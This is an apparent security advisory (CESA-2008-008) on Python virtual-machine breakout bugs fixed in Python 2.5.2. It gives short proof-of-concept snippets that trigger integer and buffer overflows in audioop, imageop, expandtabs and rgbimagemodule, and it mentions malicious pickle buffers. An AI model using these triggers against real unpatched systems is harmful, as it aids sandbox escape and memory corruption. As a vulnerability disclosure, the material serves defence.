CESA-2008-008

CESA-2008-008 - rev 1

[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

Python VM breakout bugs

Programs affected: Python prior to v2.5.2.
Severity: Break out of Python VM if you can execute arbitrary Python code. Possible attacks against trusted applications using affected APIs.

Various bugs I reported were fixed in the v2.5.2 Python release. There were a lot of Python vendor security updates recently; these fixes were fed into that process. Specific bugs include:

Integer overflow in audioop module (corruption not really controllable by attacker):
```
import audioop
s = ''
audioop.ratecv(s, 1, 1073741824, 1, 1, None)
```

Integer / buffer overflow in imageop module:

import imageop
s = ''
imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536)

Integer overflow in string expandtabs operation:
```
s = 't\tt\t'
str.expandtabs(s, 2147483647)
```

Integer overflow in rgbimagemodule.c (example bad code):

                tablen = ysize * zsize * sizeof(Py_Int32);
                starttab = (Py_Int32 *)malloc(tablen);
...
                rv = PyString_FromStringAndSize((char *) 0,
                                           (xsize*ysize+TAGLEN)*sizeof(Py_Int32)

s = 'A' * 2147483647
s2 = s + s + 'AA'

Memory corruption unpickling. Sample evil pickle buffers here here here here here.

CESA-2008-008 - rev 1
Chris Evans
scarybeasts@gmail.com